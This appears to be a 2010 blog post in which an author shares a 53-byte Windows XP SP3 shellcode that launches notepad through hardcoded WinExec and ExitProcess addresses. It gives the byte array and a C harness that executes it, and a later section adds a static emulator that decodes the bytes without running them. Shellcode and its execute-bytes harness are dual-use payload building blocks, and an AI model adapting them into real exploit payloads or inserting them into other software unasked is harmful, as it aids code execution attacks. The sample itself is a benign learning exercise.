2010
12.06
Finally, my first win32 shellcode.
This will execute notepad.exe when loaded. It runs on Windows XP SP3 English.
/*
==========================================================================
___ _ __ __ __ _ __
____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _
/ __ / / __ `/ / __/ __ `/ /_____/ _ \/ ___/ __ \/ / __ / __ \/ __ `/
/ /_/ / / /_/ / / /_/ /_/ / /_____/ __/ /__/ / / / / /_/ / / / / /_/ /
\__,_/_/\__, /_/\__/\__,_/_/ \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
/____/ http://www.digital-echidna.org
==========================================================================
Title: Windows XP SP3 (EN) 32-bit - notepad.exe shellcode 53 bytes
Author: modpr0be
Tested on: WinXP Pro SP3 (EN) 32 bit - Build 2600.xpsp_sp3_gdr.100427-1636
Greetz:
say hello to all digital-echidna org crew:
otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
special thx to amalia (^^), offsec, exploit-db, and corelan team
*/
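/* shellcodetest.c
   The bytes below build the string "cmd.exe /c notepad" on the stack, call
   WinExec and then ExitProcess. Both call targets are absolute addresses,
   valid only for the build listed under "Tested on" above. */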
char code[] = "\x31\xc0\x50\xb8\x72\x75\x11\x11"
"\x2d\x11\x11\x11\x11\x50\x68\x6f"
"\x74\x65\x70\x68\x2f\x63\x20\x6e"
"\x68\x65\x78\x65\x20\x68\x63\x6d"
"\x64\x2e\x89\xe3\x50\x53\xbb"
"\x0d\x25\x86\x7c" /*Kernel32.dll.WinExec*/
"\xff\xd3\x50\xbb"
"\x12\xcb\x81\x7c" /*Kernel32.dll.ExitProcess*/
"\xff\xd3";
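int main(int argc, char **argv)
{
    /* Treat the byte array as a function and call it. This only works when
       the memory holding code[] is executable for this process. */
    int (*func)();
    func = (int (*)()) code;
    (int)(*func)();
    return 0;
}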
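
A sample like this can be read statically instead of being run. The following is an added example, not the author's code: it interprets only the opcode forms present in code[] on a constructed fake stack and recovers the command string and the two absolute call targets. The names triage_run, struct triage, le32, STK_BASE and STK_SZ are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define STK_BASE 0x1000u  /* constructed fake stack: base address and size */
#define STK_SZ   256u
static const uint8_t sample[] =  /* bytes copied from code[] on this page */
    "\x31\xc0\x50\xb8\x72\x75\x11\x11\x2d\x11\x11\x11\x11\x50\x68\x6f"
    "\x74\x65\x70\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d"
    "\x64\x2e\x89\xe3\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x50\xbb"
    "\x12\xcb\x81\x7c\xff\xd3";
/* calls: absolute `call reg` targets; arg0: string [esp] points to at the first call */
struct triage { uint32_t calls[4]; int ncalls; char arg0[64]; };
static uint32_t le32(const uint8_t *p) {
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
/* Interprets only the opcode forms this sample uses; returns -1 on anything else. */
static int triage_run(const uint8_t *c, size_t n, struct triage *t) {
    uint8_t stk[STK_SZ + 1] = {0};            /* +1 keeps a NUL terminator */
    uint32_t r[8] = { [4] = STK_BASE + STK_SZ }, v = 0;  /* r[0]=eax r[3]=ebx r[4]=esp */
    memset(t, 0, sizeof *t);
    for (size_t i = 0; i < n; ) {
        uint8_t op = c[i], m = i + 1 < n ? c[i + 1] : 0;
        int imm = i + 5 <= n, push = 0;       /* imm: room for opcode + imm32 */
        if (op == 0x31 && m >= 0xc0)         { r[m & 7] ^= r[(m >> 3) & 7]; i += 2; } /* xor r,r */
        else if (op == 0x89 && m >= 0xc0)    { r[m & 7] = r[(m >> 3) & 7]; i += 2; }  /* mov r,r */
        else if ((op & 0xf8) == 0x50)        { v = r[op & 7]; push = 1; i += 1; }     /* push r */
        else if (op == 0x68 && imm)          { v = le32(c + i + 1); push = 1; i += 5; } /* push imm32 */
        else if ((op & 0xf8) == 0xb8 && imm) { r[op & 7] = le32(c + i + 1); i += 5; } /* mov r,imm32 */
        else if (op == 0x2d && imm)          { r[0] -= le32(c + i + 1); i += 5; }     /* sub eax,imm32 */
        else if (op == 0xff && (m & 0xf8) == 0xd0 && t->ncalls < 4) {                 /* call r */
            uint32_t p = (r[4] >= STK_BASE && r[4] <= STK_BASE + STK_SZ - 4) ? le32(stk + (r[4] - STK_BASE)) : 0;
            if (t->ncalls == 0 && p >= STK_BASE && p < STK_BASE + STK_SZ)
                snprintf(t->arg0, sizeof t->arg0, "%s", (const char *)stk + (p - STK_BASE));
            t->calls[t->ncalls++] = r[m & 7]; i += 2;  /* callee's return value is not modeled */
        } else return -1;
        if (push) {
            if (r[4] < STK_BASE + 4 || r[4] > STK_BASE + STK_SZ) return -1;  /* outside fake stack */
            r[4] -= 4;
            for (int k = 0; k < 4; k++) stk[r[4] - STK_BASE + k] = (uint8_t)(v >> (8 * k));
        }
    }
    return 0;
}
int main(void) {
    struct triage t;
    if (triage_run(sample, sizeof sample - 1, &t)) return 1;
    printf("arg0=\"%s\" calls=%d\n", t.arg0, t.ncalls);
    for (int k = 0; k < t.ncalls; k++) printf("call 0x%08x\n", (unsigned)t.calls[k]);
    return 0;
}
```

Both recovered call targets are absolute addresses, which the comments in code[] attribute to kernel32.dll on the tested build. On any other build, or on a system that randomizes module load addresses, they will not point at the same functions.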
